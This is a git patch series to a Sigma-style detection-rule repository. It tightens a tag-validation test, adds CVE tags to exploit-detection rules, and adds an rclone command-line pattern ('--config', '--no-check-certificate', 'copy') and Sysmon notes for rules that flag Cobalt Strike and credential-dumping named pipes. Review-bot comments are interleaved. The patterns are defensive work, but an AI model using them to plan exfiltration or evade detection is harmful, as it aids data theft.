a/tests/test_rules.py b/tests/test_rules.py index 6d10f80e..b31c8eab 100755 --- a/tests/test_rules.py +++ b/tests/test_rules.py 
@@ -75,20 +75,13 @@ class TestRules(unittest.TestCase): def test_optional_tags(self): files_with_incorrect_tags = [] - + tags_pattern = re.compile(r"cve\.\d+\.\d+|attack\.t\d+\.*\d*|attack\.[a-z_]+|car\.\d{4}-\d{2}-\d{3}") for file in self.yield_next_rule_file_path(self.path_to_rules): tags = self.get_rule_part(file_path=file, part_name="tags") if tags: for tag in tags: - if tag.startswith("attack."): - continue - elif tag.startswith("car."): - continue - elif tag.startswith("cve."): - print(Fore.RED + "Rule {} has the cve tag <{}> but is it a references (https://nvd.nist.gov/)".format(file, tag)) - files_with_incorrect_tags.append(file) - else: - print(Fore.RED + "Rule {} has the unknown tag <{}>".format(file, tag)) + if tags_pattern.match(tag) == None: + print(Fore.RED + "Rule {} has the invalid tag <{}>".format(file, tag)) files_with_incorrect_tags.append(file) self.assertEqual(files_with_incorrect_tags, [], Fore.RED + @@ -450,7 +443,7 @@ class TestRules(unittest.TestCase): "There are rules with malformed optional 'falsepositives' fields. (has to be a list of values even if it contains only a single value)") # Upgrade Detection Rule License 1.1 - def test_author(self): + def test_optional_author(self): faulty_rules = [] for file in self.yield_next_rule_file_path(self.path_to_rules): author_str = self.get_rule_part(file_path=file, part_name="author") @@ -459,9 +452,6 @@ class TestRules(unittest.TestCase): if not isinstance(author_str, str): print(Fore.YELLOW + "Rule {} has a 'author' field that isn't a string.".format(file)) faulty_rules.append(file) - else: - print(Fore.YELLOW + "Rule {} has no 'author' field".format(file)) - faulty_rules.append(file) self.assertEqual(faulty_rules, [], Fore.RED + "There are rules with malformed 'author' fields. (has to be a string even if it contains many author)") From f8574fcd819baa6899ec5a1a63546f6743491da6 Mon Sep 17 00:00:00 2001 
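Review bot: `tags_pattern.match(tag)` in `test_optional_tags` only anchors at the start of the tag, so values such as `attack.t1059.003x` or the `attack.registry_run_keys_/_startup_folder` tag added in patch 1316 above still pass as prefix matches; use `if tags_pattern.fullmatch(tag) is None:` (which also replaces the `== None` comparison). The `attack\.t\d+\.*\d*` alternative accepts `attack.t1059..003` and `attack.t1059003` because `\.*` allows any number of dots; `attack\.t\d+(\.\d+)?` states the sub-technique form exactly. With `fullmatch` the hyphenated `cve-2021-1678` tags introduced in patch 1325 below are still rejected, as they are by the current pattern. `test_optional_tags` continues past the hunk with the assertion message.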
From: frack113 <62423083+frack113@users.noreply.github.com> Date: Mon, 25 Oct 2021 18:40:50 +0200 Subject: [PATCH 1325/1367] Add cve tags --- .../lnx_auditd_cve_2021_3156_sudo_buffer_overflow.yml | 3 +-- ..._auditd_cve_2021_3156_sudo_buffer_overflow_brutforce.yml | 3 +-- rules/linux/lnx_sudo_cve_2019_14287.yml | 1 + rules/linux/lnx_sudo_cve_2019_14287_user.yml | 1 + .../zeek_dce_rpc_printnightmare_print_driver_install.yml | 6 ++++-- ...eb_arcadyan_router_cve_2021_20090_2021_20091_exploit.yml | 4 ++-- rules/web/web_cve_2018_2894_weblogic_exploit.yml | 3 +-- rules/web/web_cve_2020_14882_weblogic_exploit.yml | 3 +-- rules/web/web_cve_2020_3452_cisco_asa_ftd.yml | 3 +-- rules/web/web_cve_2021_2109_weblogic_rce_exploit.yml | 2 +- .../web/web_cve_2021_21978_vmware_view_planner_exploit.yml | 3 +-- rules/web/web_cve_2021_26814_wzuh_rce.yml | 4 ++-- rules/web/web_terramaster_cve_2020_28188_rce_exploit.yml | 3 +-- .../builtin/win_exploit_cve_2021_1675_printspooler.yml | 2 +- .../win_exploit_cve_2021_1675_printspooler_operational.yml | 2 +- .../win_exploit_cve_2021_1675_printspooler_security.yml | 4 ++-- rules/windows/driver_load/driver_load_vuln_dell_driver.yml | 2 +- .../file_delete/win_cve_2021_1675_printspooler_del.yml | 2 +- .../file_event_cve_2021_31979_cve_2021_33771_exploits.yml | 4 ++-- rules/windows/file_event/win_cve_2021_1675_printspooler.yml | 2 +- rules/windows/file_event/win_hivenightmare_file_exports.yml | 2 +- rules/windows/image_load/sysmon_spoolsv_dll_load.yml | 4 ++-- .../process_creation/sysmon_cve_2021_26857_msexchange.yml | 3 +-- .../windows/process_creation/win_exploit_cve_2019_1378.yml | 1 + 24 files changed, 32 insertions(+), 35 deletions(-) diff --git a/rules/linux/auditd/lnx_auditd_cve_2021_3156_sudo_buffer_overflow.yml b/rules/linux/auditd/lnx_auditd_cve_2021_3156_sudo_buffer_overflow.yml index 6c49477f..e4d19520 100644 --- a/rules/linux/auditd/lnx_auditd_cve_2021_3156_sudo_buffer_overflow.yml 
+++ b/rules/linux/auditd/lnx_auditd_cve_2021_3156_sudo_buffer_overflow.yml @@ -8,12 +8,11 @@ author: Bhabesh Raj date: 2021/02/01 modified: 2021/09/14 references: - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-3156 - https://blog.qualys.com/vulnerabilities-research/2021/01/26/cve-2021-3156-heap-based-buffer-overflow-in-sudo-baron-samedit - - https://nvd.nist.gov/vuln/detail/cve-2021-3156 tags: - attack.privilege_escalation - attack.t1068 + - cve.2021.3156 logsource: product: linux service: auditd diff --git a/rules/linux/auditd/lnx_auditd_cve_2021_3156_sudo_buffer_overflow_brutforce.yml b/rules/linux/auditd/lnx_auditd_cve_2021_3156_sudo_buffer_overflow_brutforce.yml index 7780da68..95926299 100644 --- a/rules/linux/auditd/lnx_auditd_cve_2021_3156_sudo_buffer_overflow_brutforce.yml +++ b/rules/linux/auditd/lnx_auditd_cve_2021_3156_sudo_buffer_overflow_brutforce.yml @@ -11,12 +11,11 @@ author: Bhabesh Raj date: 2021/02/01 modified: 2021/09/14 references: - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-3156 - https://blog.qualys.com/vulnerabilities-research/2021/01/26/cve-2021-3156-heap-based-buffer-overflow-in-sudo-baron-samedit - - https://nvd.nist.gov/vuln/detail/cve-2021-3156 tags: - attack.privilege_escalation - attack.t1068 + - cve.2021.3156 logsource: product: linux service: auditd diff --git a/rules/linux/lnx_sudo_cve_2019_14287.yml b/rules/linux/lnx_sudo_cve_2019_14287.yml index 22c1cfb6..dfaa5a4e 100644 --- a/rules/linux/lnx_sudo_cve_2019_14287.yml +++ b/rules/linux/lnx_sudo_cve_2019_14287.yml @@ -16,6 +16,7 @@ tags: - attack.t1068 - attack.t1169 # an old one - attack.t1548.003 + - cve.2019.14287 detection: selection_keywords: - '* -u#*' diff --git a/rules/linux/lnx_sudo_cve_2019_14287_user.yml b/rules/linux/lnx_sudo_cve_2019_14287_user.yml index ab92d197..d49f5e9c 100644 --- a/rules/linux/lnx_sudo_cve_2019_14287_user.yml +++ b/rules/linux/lnx_sudo_cve_2019_14287_user.yml 
@@ -19,6 +19,7 @@ tags: - attack.t1068 - attack.t1169 # an old one - attack.t1548.003 + - cve.2019.14287 detection: selection_user: USER: diff --git a/rules/network/zeek/zeek_dce_rpc_printnightmare_print_driver_install.yml b/rules/network/zeek/zeek_dce_rpc_printnightmare_print_driver_install.yml index adf32660..6ebaab90 100644 --- a/rules/network/zeek/zeek_dce_rpc_printnightmare_print_driver_install.yml +++ b/rules/network/zeek/zeek_dce_rpc_printnightmare_print_driver_install.yml @@ -13,10 +13,12 @@ references: - https://github.com/SigmaHQ/sigma/blob/master/rules/network/zeek/zeek_dce_rpc_mitre_bzar_persistence.yml - https://old.zeek.org/zeekweek2019/slides/bzar.pdf - https://www.crowdstrike.com/blog/cve-2021-1678-printer-spooler-relay-security-advisory/ - - https://nvd.nist.gov/vuln/detail/cve-2021-1675 - - https://nvd.nist.gov/vuln/detail/cve-2021-1678 + tags: - attack.execution + - cve-2021-1678 + - cve-2021-1675 + - cve.2021.34527 logsource: product: zeek service: dce_rpc diff --git a/rules/web/web_arcadyan_router_cve_2021_20090_2021_20091_exploit.yml b/rules/web/web_arcadyan_router_cve_2021_20090_2021_20091_exploit.yml index 06718546..869a932e 100644 --- a/rules/web/web_arcadyan_router_cve_2021_20090_2021_20091_exploit.yml +++ b/rules/web/web_arcadyan_router_cve_2021_20090_2021_20091_exploit.yml @@ -3,8 +3,6 @@ id: f0500377-bc70-425d-ac8c-e956cd906871 status: experimental description: Detects exploitation of vulnerabilities in Arcadyan routers as reported in CVE-2021-20090 and CVE-2021-20091. references: - - https://nvd.nist.gov/vuln/detail/cve-2021-20090 - - https://nvd.nist.gov/vuln/detail/cve-2021-20091 - https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2 - https://www.tenable.com/security/research/tra-2021-13 - https://blogs.juniper.net/en-us/security/freshly-disclosed-vulnerability-cve-2021-20090-exploited-in-the-wild 
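Review bot: The tags `cve-2021-1678` and `cve-2021-1675` added to zeek_dce_rpc_printnightmare_print_driver_install.yml use hyphens, while every other rule in this patch and the `tags_pattern` added to tests/test_rules.py in patch 1324 (`cve\.\d+\.\d+`) use the dotted form, so `test_optional_tags` will report this rule as having invalid tags; write them as `- cve.2021.1678` and `- cve.2021.1675`. The empty `+` line left between `references` and `tags` should be dropped as well. The `cve.2021.34527` tag has no matching entry among the references visible in this hunk, unlike the other two, which is worth a second look.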
@@ -17,6 +15,8 @@ level: critical tags: - attack.initial_access - attack.t1190 + - cve.2021.20090 + - cve.2021.20091 logsource: category: webserver detection: diff --git a/rules/web/web_cve_2018_2894_weblogic_exploit.yml b/rules/web/web_cve_2018_2894_weblogic_exploit.yml index b2fcd3e7..0ca683c2 100644 --- a/rules/web/web_cve_2018_2894_weblogic_exploit.yml +++ b/rules/web/web_cve_2018_2894_weblogic_exploit.yml @@ -6,10 +6,8 @@ author: Florian Roth date: 2018/07/22 modified: 2021/08/09 references: - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2894 - https://twitter.com/pyn3rd/status/1020620932967223296 - https://github.com/LandGrey/CVE-2018-2894 - - https://nvd.nist.gov/vuln/detail/cve-2018-2894 logsource: category: webserver detection: @@ -28,3 +26,4 @@ tags: - attack.initial_access - attack.persistence - attack.t1505.003 + - cve.2018.2894 diff --git a/rules/web/web_cve_2020_14882_weblogic_exploit.yml b/rules/web/web_cve_2020_14882_weblogic_exploit.yml index cb3545ad..92608b05 100644 --- a/rules/web/web_cve_2020_14882_weblogic_exploit.yml +++ b/rules/web/web_cve_2020_14882_weblogic_exploit.yml @@ -6,11 +6,9 @@ author: Florian Roth date: 2020/11/02 modified: 2020/11/04 references: - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14882 - https://isc.sans.edu/diary/26734 - https://twitter.com/jas502n/status/1321416053050667009?s=20 - https://twitter.com/sudo_sudoka/status/1323951871078223874 - - https://nvd.nist.gov/vuln/detail/cve-2020-14882 logsource: category: webserver detection: @@ -29,3 +27,4 @@ tags: - attack.t1100 # an old one - attack.t1190 - attack.initial_access + - cve.2020.14882 diff --git a/rules/web/web_cve_2020_3452_cisco_asa_ftd.yml b/rules/web/web_cve_2020_3452_cisco_asa_ftd.yml index f7ac95eb..5663b39d 100644 --- a/rules/web/web_cve_2020_3452_cisco_asa_ftd.yml +++ b/rules/web/web_cve_2020_3452_cisco_asa_ftd.yml 
@@ -5,10 +5,8 @@ description: Detects exploitation attempts on Cisco ASA FTD systems exploiting C author: Florian Roth date: 2021/01/07 references: - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-3452 - https://twitter.com/aboul3la/status/1286012324722155525 - https://github.com/darklotuskdb/CISCO-CVE-2020-3452-Scanner-Exploiter - - https://nvd.nist.gov/vuln/detail/CVE-2020-3452 logsource: category: webserver detection: @@ -35,3 +33,4 @@ tags: - attack.t1100 # an old one - attack.t1190 - attack.initial_access + - cve.2020.3452 \ No newline at end of file diff --git a/rules/web/web_cve_2021_2109_weblogic_rce_exploit.yml b/rules/web/web_cve_2021_2109_weblogic_rce_exploit.yml index df17a5de..410ad1e4 100644 --- a/rules/web/web_cve_2021_2109_weblogic_rce_exploit.yml +++ b/rules/web/web_cve_2021_2109_weblogic_rce_exploit.yml @@ -7,7 +7,6 @@ date: 2021/01/20 references: - https://twitter.com/pyn3rd/status/1351696768065409026 - https://mp.weixin.qq.com/s/wX9TMXl1KVWwB_k6EZOklw - - https://nvd.nist.gov/vuln/detail/cve-2021-2109 logsource: category: webserver detection: @@ -27,3 +26,4 @@ level: critical tags: - attack.t1190 - attack.initial_access + - cve.2021.2109 \ No newline at end of file diff --git a/rules/web/web_cve_2021_21978_vmware_view_planner_exploit.yml b/rules/web/web_cve_2021_21978_vmware_view_planner_exploit.yml index 9da58de5..0d0e853b 100644 --- a/rules/web/web_cve_2021_21978_vmware_view_planner_exploit.yml +++ b/rules/web/web_cve_2021_21978_vmware_view_planner_exploit.yml @@ -5,10 +5,8 @@ description: Detects the exploitation of the VMware View Planner vulnerability d author: Bhabesh Raj date: 2020/03/10 references: - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-21978 - https://twitter.com/wugeej/status/1369476795255320580 - https://paper.seebug.org/1495/ - - https://nvd.nist.gov/vuln/detail/CVE-2021-21978 logsource: category: webserver detection: 
@@ -28,3 +26,4 @@ level: high tags: - attack.initial_access - attack.t1190 + - cve.2021.21978 diff --git a/rules/web/web_cve_2021_26814_wzuh_rce.yml b/rules/web/web_cve_2021_26814_wzuh_rce.yml index 03012d37..0fba39bf 100644 --- a/rules/web/web_cve_2021_26814_wzuh_rce.yml +++ b/rules/web/web_cve_2021_26814_wzuh_rce.yml @@ -5,9 +5,7 @@ description: Detects the exploitation of the Wazuh RCE vulnerability described i author: Florian Roth date: 2021/05/22 references: - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-26814 - https://github.com/WickdDavid/CVE-2021-26814/blob/main/PoC.py - - https://nvd.nist.gov/vuln/detail/cve-2021-21978 logsource: category: webserver detection: @@ -23,3 +21,5 @@ level: high tags: - attack.initial_access - attack.t1190 + - cve.2021.21978 + - cve.2021.26814 \ No newline at end of file diff --git a/rules/web/web_terramaster_cve_2020_28188_rce_exploit.yml b/rules/web/web_terramaster_cve_2020_28188_rce_exploit.yml index 73316e52..1061b978 100644 --- a/rules/web/web_terramaster_cve_2020_28188_rce_exploit.yml +++ b/rules/web/web_terramaster_cve_2020_28188_rce_exploit.yml @@ -6,9 +6,7 @@ author: Bhabesh Raj date: 2021/01/25 references: - https://www.ihteam.net/advisory/terramaster-tos-multiple-vulnerabilities/ - - https://nvd.nist.gov/vuln/detail/CVE-2020-28188 - https://research.checkpoint.com/2021/freakout-leveraging-newest-vulnerabilities-for-creating-a-botnet/ - - https://nvd.nist.gov/vuln/detail/cve-2020-28188 logsource: category: webserver detection: @@ -35,3 +33,4 @@ level: critical tags: - attack.t1190 - attack.initial_access + - cve.2020.28188 \ No newline at end of file diff --git a/rules/windows/builtin/win_exploit_cve_2021_1675_printspooler.yml b/rules/windows/builtin/win_exploit_cve_2021_1675_printspooler.yml index 26866f88..72ac6b83 100644 --- a/rules/windows/builtin/win_exploit_cve_2021_1675_printspooler.yml +++ b/rules/windows/builtin/win_exploit_cve_2021_1675_printspooler.yml 
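Review bot: The tag `cve.2021.21978` added to web_cve_2021_26814_wzuh_rce.yml belongs to the VMware View Planner rule directly above (web_cve_2021_21978_vmware_view_planner_exploit.yml); it was carried over from the mistaken `nvd.nist.gov/vuln/detail/cve-2021-21978` reference that the first hunk of this file removes, so only `- cve.2021.26814` should remain. The file is also left without a trailing newline, which the `\ No newline at end of file` marker shows.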
@@ -8,11 +8,11 @@ references: - https://github.com/hhlxf/PrintNightmare - https://github.com/afwu/PrintNightmare - https://twitter.com/fuzzyf10w/status/1410202370835898371 - - https://nvd.nist.gov/vuln/detail/cve-2021-1675 date: 2021/06/30 modified: 2021/07/08 tags: - attack.execution + - cve.2021.1675 logsource: product: windows service: printservice-admin diff --git a/rules/windows/builtin/win_exploit_cve_2021_1675_printspooler_operational.yml b/rules/windows/builtin/win_exploit_cve_2021_1675_printspooler_operational.yml index 4fbbee51..82341850 100644 --- a/rules/windows/builtin/win_exploit_cve_2021_1675_printspooler_operational.yml +++ b/rules/windows/builtin/win_exploit_cve_2021_1675_printspooler_operational.yml @@ -6,10 +6,10 @@ status: experimental level: critical references: - https://twitter.com/MalwareJake/status/1410421967463731200 - - https://nvd.nist.gov/vuln/detail/cve-2021-1675 date: 2021/07/01 tags: - attack.execution + - cve.2021.1675 logsource: product: windows service: printservice-operational diff --git a/rules/windows/builtin/win_exploit_cve_2021_1675_printspooler_security.yml b/rules/windows/builtin/win_exploit_cve_2021_1675_printspooler_security.yml index d36b0ea4..902544f9 100644 --- a/rules/windows/builtin/win_exploit_cve_2021_1675_printspooler_security.yml +++ b/rules/windows/builtin/win_exploit_cve_2021_1675_printspooler_security.yml @@ -6,11 +6,11 @@ status: experimental level: critical references: - https://twitter.com/INIT_3/status/1410662463641731075 - - https://nvd.nist.gov/vuln/detail/cve-2021-1675 - - https://nvd.nist.gov/vuln/detail/cve-2021-34527 date: 2021/07/02 tags: - attack.execution + - cve.2021.1675 + - cve.2021.34527 logsource: product: windows service: security diff --git a/rules/windows/driver_load/driver_load_vuln_dell_driver.yml b/rules/windows/driver_load/driver_load_vuln_dell_driver.yml index ea92afb4..1e361bd9 100644 --- a/rules/windows/driver_load/driver_load_vuln_dell_driver.yml 
+++ b/rules/windows/driver_load/driver_load_vuln_dell_driver.yml @@ -5,12 +5,12 @@ author: Florian Roth date: 2021/05/05 references: - https://labs.sentinelone.com/cve-2021-21551-hundreds-of-millions-of-dell-computers-at-risk-due-to-multiple-bios-driver-privilege-escalation-flaws/ - - https://nvd.nist.gov/vuln/detail/cve-2021-21551 logsource: category: driver_load product: windows tags: - attack.privilege_escalation + - cve.2021.21551 detection: selection_image: ImageLoaded|contains: '\DBUtil_2_3.Sys' diff --git a/rules/windows/file_delete/win_cve_2021_1675_printspooler_del.yml b/rules/windows/file_delete/win_cve_2021_1675_printspooler_del.yml index 397a66b1..bd5fb4ab 100644 --- a/rules/windows/file_delete/win_cve_2021_1675_printspooler_del.yml +++ b/rules/windows/file_delete/win_cve_2021_1675_printspooler_del.yml @@ -5,7 +5,6 @@ description: Detect DLL deletions from Spooler Service driver folder references: - https://github.com/hhlxf/PrintNightmare - https://github.com/cube0x0/CVE-2021-1675 - - https://nvd.nist.gov/vuln/detail/cve-2021-1675 author: Bhabesh Raj date: 2021/07/01 modified: 2021/08/24 @@ -14,6 +13,7 @@ tags: - attack.defense_evasion - attack.privilege_escalation - attack.t1574 + - cve.2021.1675 logsource: category: file_delete product: windows diff --git a/rules/windows/file_event/file_event_cve_2021_31979_cve_2021_33771_exploits.yml b/rules/windows/file_event/file_event_cve_2021_31979_cve_2021_33771_exploits.yml index c1f90858..1c07a1d3 100644 --- a/rules/windows/file_event/file_event_cve_2021_31979_cve_2021_33771_exploits.yml +++ b/rules/windows/file_event/file_event_cve_2021_31979_cve_2021_33771_exploits.yml 
@@ -8,12 +8,12 @@ modified: 2021/09/09 references: - https://www.microsoft.com/security/blog/2021/07/15/protecting-customers-from-a-private-sector-offensive-actor-using-0-day-exploits-and-devilstongue-malware/ - https://citizenlab.ca/2021/07/hooking-candiru-another-mercenary-spyware-vendor-comes-into-focus/ - - https://nvd.nist.gov/vuln/detail/cve-2021-33771 - - https://nvd.nist.gov/vuln/detail/cve-2021-31979 tags: - attack.credential_access - attack.t1566 - attack.t1203 + - cve.2021.33771 + - cve.2021.31979 # - threat_group.Sourgum logsource: product: windows diff --git a/rules/windows/file_event/win_cve_2021_1675_printspooler.yml b/rules/windows/file_event/win_cve_2021_1675_printspooler.yml index 9f426abd..25264ba5 100644 --- a/rules/windows/file_event/win_cve_2021_1675_printspooler.yml +++ b/rules/windows/file_event/win_cve_2021_1675_printspooler.yml @@ -8,12 +8,12 @@ references: - https://github.com/hhlxf/PrintNightmare - https://github.com/afwu/PrintNightmare - https://github.com/cube0x0/CVE-2021-1675 - - https://nvd.nist.gov/vuln/detail/cve-2021-1675 date: 2021/06/29 modified: 2021/07/01 tags: - attack.execution - attack.privilege_escalation + - cve.2021.1675 logsource: category: file_event product: windows diff --git a/rules/windows/file_event/win_hivenightmare_file_exports.yml b/rules/windows/file_event/win_hivenightmare_file_exports.yml index ea5cc888..e4acb494 100644 --- a/rules/windows/file_event/win_hivenightmare_file_exports.yml +++ b/rules/windows/file_event/win_hivenightmare_file_exports.yml @@ -9,13 +9,13 @@ references: - https://github.com/FireFart/hivenightmare/ - https://github.com/WiredPulse/Invoke-HiveNightmare - https://twitter.com/cube0x0/status/1418920190759378944 - - https://nvd.nist.gov/vuln/detail/cve-2021-36934 logsource: product: windows category: file_event tags: - attack.credential_access - attack.t1552.001 + - cve.2021.36934 detection: selection: - TargetFilename|contains: 
diff --git a/rules/windows/image_load/sysmon_spoolsv_dll_load.yml b/rules/windows/image_load/sysmon_spoolsv_dll_load.yml index 38e94f80..44ff79a9 100644 --- a/rules/windows/image_load/sysmon_spoolsv_dll_load.yml +++ b/rules/windows/image_load/sysmon_spoolsv_dll_load.yml @@ -4,8 +4,6 @@ status: experimental description: Detect DLL Load from Spooler Service backup folder references: - https://github.com/hhlxf/PrintNightmare - - https://nvd.nist.gov/vuln/detail/cve-2021-1675 - - https://nvd.nist.gov/vuln/detail/cve-2021-34527 author: FPT.EagleEye, Thomas Patzke (improvements) date: 2021/06/29 modified: 2021/08/24 @@ -14,6 +12,8 @@ tags: - attack.defense_evasion - attack.privilege_escalation - attack.t1574 + - cve.2021.1675 + - cve.2021.34527 logsource: category: image_load product: windows diff --git a/rules/windows/process_creation/sysmon_cve_2021_26857_msexchange.yml b/rules/windows/process_creation/sysmon_cve_2021_26857_msexchange.yml index b0102bf5..fe5b0da8 100644 --- a/rules/windows/process_creation/sysmon_cve_2021_26857_msexchange.yml +++ b/rules/windows/process_creation/sysmon_cve_2021_26857_msexchange.yml @@ -6,13 +6,12 @@ author: Bhabesh Raj status: experimental level: critical references: - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-26857 - https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/ - - https://nvd.nist.gov/vuln/detail/cve-2021-26857 date: 2021/03/03 tags: - attack.t1203 - attack.execution + - cve.2021.26857 logsource: category: process_creation product: windows diff --git a/rules/windows/process_creation/win_exploit_cve_2019_1378.yml b/rules/windows/process_creation/win_exploit_cve_2019_1378.yml index a4593acf..43b24985 100644 --- a/rules/windows/process_creation/win_exploit_cve_2019_1378.yml +++ b/rules/windows/process_creation/win_exploit_cve_2019_1378.yml 
@@ -14,6 +14,7 @@ tags: - attack.t1059.003 - attack.t1059 # an old one - attack.t1574 + - cve.2019.1378 logsource: category: process_creation product: windows From 193357cf174fe95be8a6b59ed327568c5a78e5c5 Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Mon, 25 Oct 2021 18:51:40 +0200 Subject: [PATCH 1326/1367] Add cve tags --- .../zeek/zeek_dce_rpc_printnightmare_print_driver_install.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/rules/network/zeek/zeek_dce_rpc_printnightmare_print_driver_install.yml b/rules/network/zeek/zeek_dce_rpc_printnightmare_print_driver_install.yml index 6ebaab90..da006cf6 100644 --- a/rules/network/zeek/zeek_dce_rpc_printnightmare_print_driver_install.yml +++ b/rules/network/zeek/zeek_dce_rpc_printnightmare_print_driver_install.yml @@ -16,8 +16,8 @@ references: tags: - attack.execution - - cve-2021-1678 - - cve-2021-1675 + - cve.2021.1678 + - cve.2021.1675 - cve.2021.34527 logsource: product: zeek From 8eee468cc3c2716236cd61a71555ccc4c767a20a Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Mon, 25 Oct 2021 20:49:30 +0200 Subject: [PATCH 1327/1367] Add detect_by_option --- .../windows/process_creation/win_susp_rclone_execution.yml | 7 ++++++- 1 file changed, 6 insertions(+), 1 deletion(-) diff --git a/rules/windows/process_creation/win_susp_rclone_execution.yml b/rules/windows/process_creation/win_susp_rclone_execution.yml index 5f185a57..9dfaab71 100644 --- a/rules/windows/process_creation/win_susp_rclone_execution.yml +++ b/rules/windows/process_creation/win_susp_rclone_execution.yml @@ -20,6 +20,11 @@ logsource: product: windows category: process_creation detection: + detect_by_option: + CommandLine|contains|all: + - '--config ' + - '--no-check-certificate ' + - ' copy ' exec_selection: Image|endswith: '\rclone.exe' ParentImage|endswith: 
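Review bot: The `detect_by_option` strings all carry a trailing space, so `--no-check-certificate` given as the last token of the command line will not match `'--no-check-certificate '`; dropping that trailing space (`'--no-check-certificate'`) closes the gap while `'--config '` and `' copy '` are always followed by an argument and can stay. The condition changed in the next hunk, `detect_by_option or command_selection and ( description_selection or exec_selection )`, depends on `and` binding tighter than `or`; writing it as `detect_by_option or ( command_selection and ( description_selection or exec_selection ) )` makes that explicit to the next reader. `detect_by_option` has no Image or Description constraint, so any tool invoked with those three arguments fires the rule; the `falsepositives` section (outside this hunk) should say so.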
@@ -45,7 +50,7 @@ detection: - 'no-check-certificate ' description_selection: Description: 'Rsync for cloud storage' - condition: command_selection and ( description_selection or exec_selection ) + condition: detect_by_option or command_selection and ( description_selection or exec_selection ) fields: - CommandLine - ParentCommandLine From ad0bcebe9cec2f726b808d1199f8a7e64345183f Mon Sep 17 00:00:00 2001 From: WojciechLesicki Date: Mon, 25 Oct 2021 21:30:33 +0200 Subject: [PATCH 1328/1367] Adding some additional details about sysmon config and also way to test detection. --- rules/windows/pipe_created/pipe_created_tool_psexec.yml | 3 ++- rules/windows/pipe_created/sysmon_apt_turla_namedpipes.yml | 3 +-- .../pipe_created/sysmon_cred_dump_tools_named_pipes.yml | 1 + rules/windows/pipe_created/sysmon_efspotato_namedpipe.yml | 2 +- rules/windows/pipe_created/sysmon_mal_cobaltstrike.yml | 2 +- rules/windows/pipe_created/sysmon_mal_cobaltstrike_re.yml | 2 +- rules/windows/pipe_created/sysmon_mal_namedpipes.yml | 2 +- rules/windows/pipe_created/sysmon_psexec_pipes_artifacts.yml | 2 +- .../pipe_created/sysmon_susp_cobaltstrike_pipe_patterns.yml | 2 +- .../pipe_created/sysmon_susp_wmi_consumer_namedpipe.yml | 2 +- 10 files changed, 11 insertions(+), 10 deletions(-) diff --git a/rules/windows/pipe_created/pipe_created_tool_psexec.yml b/rules/windows/pipe_created/pipe_created_tool_psexec.yml index b662d0ef..900ec9f5 100644 --- a/rules/windows/pipe_created/pipe_created_tool_psexec.yml +++ b/rules/windows/pipe_created/pipe_created_tool_psexec.yml 
@@ -27,10 +27,11 @@ fields: logsource: category: pipe_created product: windows + definition: 'Note that you have to configure logging for Named Pipe Events in Sysmon config (Event ID 17 and Event ID 18). The basic configuration is in popular sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config), but it is worth verifying. You can also use other repo, e.g. https://github.com/Neo23x0/sysmon-config, https://github.com/olafhartong/sysmon-modular. How to test detection? You can check powershell script from this site https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575' detection: sysmon_pipecreated: PipeName: '\PSEXESVC' condition: sysmon_pipecreated falsepositives: - unknown -level: low \ No newline at end of file +level: low diff --git a/rules/windows/pipe_created/sysmon_apt_turla_namedpipes.yml b/rules/windows/pipe_created/sysmon_apt_turla_namedpipes.yml index 313d3435..66e600c1 100755 --- a/rules/windows/pipe_created/sysmon_apt_turla_namedpipes.yml +++ b/rules/windows/pipe_created/sysmon_apt_turla_namedpipes.yml @@ -11,7 +11,7 @@ author: Markus Neis logsource: product: windows category: pipe_created - definition: 'Note that you have to configure logging for PipeEvents in Symson config' + definition: 'Note that you have to configure logging for Named Pipe Events in Sysmon config (Event ID 17 and Event ID 18). The basic configuration is in popular sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config), but it is worth verifying. You can also use other repo, e.g. https://github.com/Neo23x0/sysmon-config, https://github.com/olafhartong/sysmon-modular. How to test detection? You can check powershell script from this site https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575' detection: selection: PipeName: @@ -25,4 +25,3 @@ detection: falsepositives: - Unknown level: critical - 
diff --git a/rules/windows/pipe_created/sysmon_cred_dump_tools_named_pipes.yml b/rules/windows/pipe_created/sysmon_cred_dump_tools_named_pipes.yml index ad56fd69..e4c7897d 100644 --- a/rules/windows/pipe_created/sysmon_cred_dump_tools_named_pipes.yml +++ b/rules/windows/pipe_created/sysmon_cred_dump_tools_named_pipes.yml @@ -16,6 +16,7 @@ tags: logsource: product: windows category: pipe_created + definition: 'Note that you have to configure logging for Named Pipe Events in Sysmon config (Event ID 17 and Event ID 18). The basic configuration is in popular sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config), but it is worth verifying. You can also use other repo, e.g. https://github.com/Neo23x0/sysmon-config, https://github.com/olafhartong/sysmon-modular. How to test detection? You can check powershell script from this site https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575' detection: selection: PipeName|contains: diff --git a/rules/windows/pipe_created/sysmon_efspotato_namedpipe.yml b/rules/windows/pipe_created/sysmon_efspotato_namedpipe.yml index 9d444f88..850a6f68 100644 --- a/rules/windows/pipe_created/sysmon_efspotato_namedpipe.yml +++ b/rules/windows/pipe_created/sysmon_efspotato_namedpipe.yml 
